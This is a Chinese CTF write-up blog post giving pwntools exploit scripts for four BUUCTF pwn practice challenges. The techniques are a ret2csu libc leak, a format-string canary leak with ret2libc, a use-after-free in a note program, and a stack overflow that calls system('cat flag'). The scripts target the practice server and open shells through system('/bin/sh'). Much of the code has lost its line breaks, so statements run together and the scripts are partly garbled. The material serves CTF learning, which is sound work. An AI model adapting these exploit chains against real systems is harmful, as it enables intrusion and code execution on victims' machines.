PWN-PRACTICE-BUUCTF-10
生活随笔
收集整理的這篇文章主要介紹了
PWN-PRACTICE-BUUCTF-10
小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
PWN-PRACTICE-BUUCTF-10
- jarvisoj_level3_x64
- bjdctf_2020_babyrop2
- hitcontraining_uaf
- jarvisoj_test_your_memory
jarvisoj_level3_x64
64位elf的棧溢出,ret2csu
from pwn import * #context.log_level='debug' #io=process('./jarvisoj_level3_x64') io=remote('node4.buuoj.cn',29473) elf=ELF('./jarvisoj_level3_x64') libc=ELF('./libc-2.23-x64.so') part1=0x4006AA part2=0x400690 write_plt=elf.plt['write'] write_got=elf.got['write'] read_got=elf.got['read'] main_addr=elf.sym['main'] pop_rdi=0x4006b3 io.recvuntil('Input:\n') payload='a'*(0x80+8) def com_gadget(part1, part2, jmp2, arg1 = 0x0, arg2 = 0x0, arg3 = 0x0):payload = p64(part1) # part1 entry pop_rbx_rbp_r12_r13_r14_r15_retpayload += p64(0x0) # rbx must be 0x0payload += p64(0x1) # rbp must be 0x1payload += p64(jmp2) # r12 jump topayload += p64(arg3) # r13 -> rdx arg3payload += p64(arg2) # r14 -> rsi arg2payload += p64(arg1) # r15d -> edi arg1payload += p64(part2) # part2 entry will call [r12+rbx*0x8]payload += 'A' * 56 # junk 6*8+8=56return payload payload+=com_gadget(part1,part2,write_got,1,read_got,8) payload+=p64(main_addr) io.sendline(payload) read_addr=u64(io.recv(6).ljust(8,'\x00')) print(hex(read_addr)) libc_base=read_addr-libc.sym['read'] system=libc_base+libc.sym['system'] binsh=libc_base+libc.search('/bin/sh\x00').next() io.recvuntil('Input:\n') payload='a'*(0x80+8)+p64(pop_rdi)+p64(binsh)+p64(system)+p64(main_addr) io.sendline(payload) io.interactive()bjdctf_2020_babyrop2
格式化字符串泄露canary,然后棧溢出ret2libc
from pwn import * #context.log_level='debug' #io=process('./bjdctf_2020_babyrop2') io=remote('node4.buuoj.cn',28650) elf=ELF('./bjdctf_2020_babyrop2') libc=ELF('./libc-2.23-x64.so') puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] vuln_addr=elf.sym['vuln'] pop_rdi=0x400993 io.recvuntil('help u!\n') io.sendline('%7$lx') canary=int(io.recvuntil('\n')[:-1],16) print(hex(canary)) io.recvuntil('story!\n') payload='a'*(0x20-8)+p64(canary)+'b'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln_addr) io.sendline(payload) puts_addr=u64(io.recv(6).ljust(8,'\x00')) print(hex(puts_addr)) libc_base=puts_addr-libc.sym['puts'] system=libc_base+libc.sym['system'] binsh=libc_base+libc.search('/bin/sh\x00').next() payload1='a'*(0x20-8)+p64(canary)+'b'*8+p64(pop_rdi)+p64(binsh)+p64(system)+p64(vuln_addr) io.recvuntil('story!\n') io.sendline(payload1) io.interactive()hitcontraining_uaf
參考:[BUUCTF]PWN——hitcontraining_uaf
from pwn import* io=remote('node4.buuoj.cn',26666) #io=process('./hacknote') elf=ELF('./hacknote')def add(size,content):io.sendlineafter('choice :','1')io.sendlineafter('Note size :',str(size))io.sendlineafter('Content :',content)def delete(idx):io.sendlineafter('choice :','2')io.sendlineafter('Index :',str(idx))def print_(idx):io.sendlineafter('choice :','3')io.sendlineafter('Index :',str(idx))magic=0x8048945add(0x10,'aaaa') add(0x10,'bbbb')delete(0) delete(1)add(8,p32(magic))print_(0)io.interactive()jarvisoj_test_your_memory
題目給出了字符串"cat flag"的地址
mem_test函數(shù)中存在棧溢出漏洞
ret到win_func函數(shù),字符串"cat flag"的地址作為參數(shù),執(zhí)行system(“cat flag”)打印flag
總結(jié)
以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-10的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 国庆期间不能持股?A股最近三年的表现告诉
- 下一篇: 南京大学计算机考研分数线2021,南京大